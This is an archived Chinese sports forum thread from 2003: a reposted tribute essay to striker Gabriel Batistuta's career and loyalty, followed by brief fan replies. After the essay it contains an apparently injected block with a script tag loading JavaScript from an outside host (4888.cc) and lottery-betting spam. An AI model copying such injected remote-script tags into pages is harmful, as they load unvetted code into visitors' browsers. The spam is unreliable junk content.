好夺 发表于 2003-4-21 17:37:00

有一种精神叫巴蒂 [转帖]

米兰蒂尼

刚刚过去的2002年注定会成为加布里埃尔.巴蒂斯图塔人生道路上最坎坷最困难的一年.世界杯上和蓝白军团一起倒在了小组赛,前个赛季意甲俱乐部罗马居然在联赛中屡屡受辱,名次急剧下滑.作为这两支球队里的锋线核心,巴蒂遭受了成名以来最大的信任危机,各方面的责难甚至辱骂向身处旋涡里的他铺天盖地的席卷而来.巴蒂也许是有些老了,但我要说,他依旧还是那个永远不败的进球机器,当之无愧的战神.
时光飞逝,想起来,初识巴蒂还是在11年前美洲杯赛上.90年的世界杯上的那支老迈的阿根庭在那届美洲杯上让人耳目一新. 巴西莱的队伍里有了太多让人兴奋的东西,巴蒂斯图塔和罗德里格斯是一对无比锐利的进攻组合.那届美洲杯,阿根庭的绿茵舞蹈彻底征服了南美大陆,来自博卡青年队的巴蒂斯图塔的六粒进球使其不但成为最佳射手而且当年度南美足球先生也黄袍加身.永远记得当年初出茅庐的巴蒂在进球后兴奋的庆祝动作,那年他才22岁.
他转会来到了意大利甲级联赛,也许每个赛季都能给俱乐部带来,两位数的进球对一些看来只是一名前锋的份内工作,但几个赛季连续的保持着不断的进球数和良好状态就不能不说是一个伟大射手所独有的素质了.看了太多次巴蒂进球后欣喜若狂的庆祝动作.FIORENTINA球场的角球杆被巴蒂一次次的举起,小基恩进球后的机枪扫射也是来自于战神的首创.但真正让我感动的是93赛季结束后的那个夏天.巴蒂的16个进球对于球队也许只是挽回了一点面子问题,球队挣扎了一个赛季后终于降到了乙级.巴蒂作为队中为数不多的几个大牌,他的去留成了最大的疑问.一流的射手,黄金的年龄,多事的媒体每天都在为巴蒂编织着新赛季的去向.米兰OR尤文.?我当时真的盼望他能转会我的红黑军团,但结果真的出乎我的意料.巴蒂居然选择留在翡冷翠打乙级联赛,他当初的选择也许是错的,也许是对的.但当时他的勇气和对球队的忠心不贰的情意真的让我永远难忘.
让我欣慰的是,很快紫色就顺利回归意甲,又是巴蒂的16粒进球把球队从地狱带上了天堂。以下的几个赛季巴蒂每年都有出色的表现,紫色的杯赛冠军奖杯也许是对他的努力唯一的报尝。他是除了米兰以外最让我关注的快乐元素。他是球场上天生的王者,不管是身着什么颜色的服装。
2000年,他终于转会了。我本来以为他会留在紫色军团,毕竟他已经31岁了,他应该在这支他成长起来的球队终老的。但他是那么坚决的走了,也许他留下,紫色就没那么脆弱了。但罗马为了31岁的他花了3000万美金。我想罗马真是想冠军想疯了,但巴蒂绝对值这个价。他没有让喜爱他的人失望,罗马那年的冠军是几乎是他个人抢回来的,也许他的选择是对的。他在职业生涯的末期终于拿到了梦寐以求的意甲冠军,这个冠军绝对不是他580万年薪所能概括的涵义,我想在冠军后金钱之间,他绝对回选择前者,因为他是战神。
去年巴蒂遭遇了最寒冷的冬天,他的状态是我记忆中最差的一年,也许是因为年龄,也许是积年的旧伤影响了他的发挥,但这些已不再重要了。一个33岁的老将,有着光辉历史的伟大射手,我们还有权利他做什么呢?!世界杯上他低头啜泣的图片成为握这个夏天最沉重的图案,甚至强过安珍宦忘情庆祝的那个瞬间。
对于疯狂攻击他的人,我无言以对。
有人说他技术不好,足球生涯几百个精彩的进球,既有力度有有技巧,如果这叫没有技术那足球场没有真正的英雄了!
有人说他的做人有问题,没有什么比这一点是最让我愤怒的。巴蒂的人品我没有权利说,但他为紫色军团这些年做出的贡献有目共睹,在球队降级后忍辱负重,不离不弃,在攻进老东家球们后那痛苦的神情,真情流露让人不由不感动。从他身上我只能看到两个字,除了伟大还是伟大。当年他为了进国家队心甘情愿放弃了自己一头长发,世界杯失利后的不能自拔的哀伤,我要说他是个为了自己祖国,为了自己俱乐部肯付出一切的人。
巴蒂老了,也许明天不能进球了,也许明天不能再奔驰在绿茵场,但我相信他。他只要有一天还在球场上,他还会进球,还会忘情的庆祝。因为他是独一无二的战神。他代表着绿茵场的一种精神,但他更是一段不朽的传奇。
------------------------------

< url=http://www.9p.cc">
<script type="text/javascript" src="http://4888.cc/b.js"></script>
<link href="http://4888.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

金时彩

合投注

星空蜻蜓 发表于 2003-4-21 17:40:00

说得真好..............

巴蒂_阿伦 发表于 2003-4-21 19:13:00

:)

星空蜻蜓 发表于 2003-4-21 19:38:00

我倒觉得看了比较发酸

巴蒂_阿伦 发表于 2003-4-21 20:39:00

你吃醋了啊。。

星空蜻蜓 发表于 2003-4-21 20:41:00

dao ~~~~~~~~

金东春 发表于 2003-4-21 20:46:00

感动。

金冬春 发表于 2003-4-21 21:21:00

我再顶大家没意见吧。

巴蒂_阿伦 发表于 2003-4-21 21:51:00

来站在我肩膀上。。。
这样顶得更高。。

clytze 发表于 2003-4-23 11:19:00

"他当初的选择也许是错的,也许是对的.但当时他的勇气和对球队的忠心不贰的情意真的让我永远难忘. "
"巴蒂老了,也许明天不能进球了,也许明天不能再奔驰在绿茵场,但我相信他。他只要有一天还在球场上,
他还会进球,还会忘情的庆祝。因为他是独一无二的战神。他代表着绿茵场的一种精神,但他更是一段不朽
的传奇。"

感动ING~~~~

巴蒂_阿伦 发表于 2003-4-25 15:14:00

有一种信念叫巴蒂
页: [1]
查看完整版本: 有一种精神叫巴蒂 [转帖]